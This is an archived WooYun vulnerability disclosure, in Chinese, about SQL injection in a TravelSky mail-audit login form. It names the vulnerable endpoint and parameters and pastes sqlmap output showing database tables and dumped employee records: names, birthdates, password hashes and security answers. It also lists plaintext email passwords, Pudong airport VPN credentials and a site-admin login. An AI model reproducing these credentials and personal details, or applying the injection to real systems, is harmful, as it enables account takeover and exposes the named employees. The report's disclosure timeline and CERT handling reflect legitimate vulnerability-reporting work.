乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-03: 细节已通知厂商并且等待厂商处理中 2015-07-07: 厂商已经确认,细节仅向厂商公开 2015-07-17: 细节向核心白帽子及相关领域专家公开 2015-07-27: 细节向普通白帽子公开 2015-08-06: 细节向实习白帽子公开 2015-08-21: 细节向公众公开
中航信某重要系统sql注入导致全部邮箱沦陷(内含各种敏感信息/吉祥航空可漫游/浦东机场可漫游等)全部至少5000多个员工邮箱 太多了 翻不完 各种敏感信息一堆堆的
https://mailaudit.travelsky.com:443/email/email.asp (POST)email=travelsky&yuming=travelsky&pwd=123456&submit=%B5%C7%C2%BC
yuming、pwd两个参数都存在注入
[0] place: POST, parameter: yuming, type: Single quoted string (default)[1] place: POST, parameter: email, type: Single quoted string[q] Quit> 0[18:33:34] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: MySQL 5.0[18:33:34] [INFO] fetching tables for database: 'cmxt'[18:33:34] [INFO] the SQL query used returns 49 entriesDatabase: cmxt[49 tables]+-----------------------+| ax_action || ax_content_filter || ax_policy || ax_sender_filter || cm_mbox || cm_monitor_rules || cm_obj_info || cm_timedsend || cm_user_bin_data || cm_user_info || cm_user_pref || cm_user_pref_ext || honeypot || tc_event || tc_task || td_alias_seed || td_allowed_domain || td_cos || td_cos_dd || td_cos_detail || td_domain || td_domain_alias || td_obj || td_op_log || td_org_cos || td_org_unit || td_organization || td_provider || td_provider_cos || td_site_admin || td_smtp_alias || td_system_admin || td_user || td_user_service || tl_imap || tl_pop || tl_server_info || tl_sys_access_stat || tl_sys_mailinfo_stat || tl_sys_recv_stat || tl_sys_sent_stat || tl_user_access_stat || tl_user_lastmailinfo || tl_user_mailinfo_stat || tl_user_recv_stat || tl_user_sent_stat || tl_wap || tl_web || wm_event |+-----------------------+
[21:02:29] [INFO] retrieved: clsun[21:02:29] [INFO] retrieved: 1982-02-28[21:02:29] [INFO] retrieved: {enc2}a7a192edd9e8fd19a50ea38161786fca\\n{enc4}3cdf3718757ce758603a648a01c706da[21:02:29] [INFO] retrieved: travelsky[21:02:29] [INFO] retrieved: 我吃过饭了[21:02:30] [INFO] retrieved: 我老婆生日是什么?[21:02:30] [INFO] retrieved: 文春林[21:02:30] [INFO] retrieved: clwen[21:02:30] [INFO] retrieved: [21:02:30] [INFO] retrieved: [21:02:30] [INFO] retrieved: travelsky[21:02:30] [INFO] retrieved: [21:02:30] [INFO] retrieved: [21:02:30] [INFO] retrieved: 旅交部差旅周报[21:02:30] [INFO] retrieved: clzb[21:02:30] [INFO] retrieved: 1990-04-30[21:02:31] [INFO] retrieved: {enc2}698d51a19d8a121ce581499d7b701668\\n{enc4}75f1d23f3a2527c6bfaada3e93b32a8b[21:02:31] [INFO] retrieved: travelsky[21:02:31] [INFO] retrieved: [21:02:31] [INFO] retrieved: [21:02:31] [INFO] retrieved: Ő\\xd4˛\\xfdŔ\\xf6[21:02:31] [INFO] retrieved: clzha[21:02:31] [INFO] retrieved: 1986-04-19[21:02:31] [INFO] retrieved: {enc2}2a355042fb8f011bf6347db6e889b90c\\n{enc4}ca4f5368f8fb33cd7131896c0b9038cc[21:02:32] [INFO] retrieved: travelsky[21:02:32] [INFO] retrieved: 0613[21:02:32] [INFO] retrieved: 母亲[21:02:32] [INFO] retrieved: 张超林[21:02:32] [INFO] retrieved: clzhang[21:02:32] [INFO] retrieved: 1990-04-30[21:02:32] [INFO] retrieved: {enc2}a2d3008f4a67ef47d8de0a7f165418d4[21:02:32] [INFO] retrieved: travelsky[21:02:32] [INFO] retrieved: [21:02:32] [INFO] retrieved: [21:02:33] [INFO] retrieved: Ő\\xd4˛\\xfdŔ\\xf6[21:02:33] [INFO] retrieved: clzhao[21:02:33] [INFO] retrieved: 1986-10-23[21:02:33] [INFO] retrieved: {enc2}798cb46e490205a35e5c335c4336d7e7\\n{enc4}fcab4153e9f7929b6f7a6eace4bdc6ac[21:02:33] [INFO] retrieved: travelsky[21:02:33] [INFO] retrieved: [21:02:33] [INFO] retrieved: [21:02:33] [INFO] retrieved: 郑长领[21:02:33] [INFO] retrieved: clzheng[21:02:34] [INFO] retrieved: 1988-02-10[21:02:34] [INFO] retrieved: {enc2}9509e054df5d81468ad6603deaf7b7c9\\n{enc4}fe9b16a18b6a766257526317ab7c8d67[21:02:34] [INFO] retrieved: travelsky[21:02:34] [INFO] retrieved: [21:02:34] [INFO] retrieved: [21:02:34] [INFO] retrieved: \\xd6Ů\\xb4ş\\xc1\\xfa[21:02:34] [INFO] retrieved: clzhong[21:02:34] [INFO] retrieved: 1989-02-02[21:02:35] [INFO] retrieved: {enc2}794b649ae8424236296a6b9b140c4c0f\\n{enc4}a2de6ad83220d75a11f5e29b2bd7e7dc[21:02:35] [INFO] retrieved: travelsky[21:02:35] [INFO] retrieved: \\xce\\xe2\\xc2\\xfcČŮ[21:02:35] [INFO] retrieved: 母亲的名字[21:02:35] [INFO] retrieved: 马驰[21:02:35] [INFO] retrieved: cma[21:02:35] [INFO] retrieved: 1975-07-02[21:02:35] [INFO] retrieved: {enc2}0aea423b215865f42673db81b2e5dbc4\\n{enc4}f3d98131183997199ecba057c1eb75b5[21:02:35] [INFO] retrieved: travelsky[21:02:36] [INFO] retrieved: Daisy[21:02:36] [INFO] retrieved: 宸宸英文名[21:02:36] [INFO] retrieved: ˇś\\xb4ş\\xc2\\xfc[21:02:36] [INFO] retrieved: cmfan[21:02:36] [INFO] retrieved: 1990-10-09[21:02:36] [INFO] retrieved: {enc2}bf4199b557ba63971f7cc1ca968f40a9[21:02:36] [INFO] retrieved: travelsky[21:02:36] [INFO] retrieved: [21:02:36] [INFO] retrieved: [21:02:36] [INFO] retrieved: 胡承明[21:02:37] [INFO] retrieved: cmhu[21:02:37] [INFO] retrieved: 1988-05-25[21:02:37] [INFO] retrieved: {enc2}9433ec4fdb79824524687da195ed8e43[21:02:37] [INFO] retrieved: travelsky
5000+账号 列举几个:
[email protected] loveSandyshennan leiyong412xuling 18801916636xlxpyu PJxp@112784stsi Shawn,01zying xiaokeai123,.wx_yangmengwangzhi smart765xuefeng xuefeng123!hanjing 360385liuhlliu 10273ha11chjunan 8Bawcwtpv8zangting joyce623108
浦东机场vpn:
vpn使用:1,下载cisco vpn安装后配置地址:116.236.186.18拨入许可:spiavpn spiavpn 2,VPN用户名帐号: SAG_TEST 密码:sag_test3,按照附件说明书内容登录网关,用户名 LIGANG密码 LIGANG123
https://mail.infosky.com.cn/siteadmin/[email protected] bitsuper
蛮重视安全的
危害等级:高
漏洞Rank:13
确认时间:2015-07-07 09:51
CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置.
暂无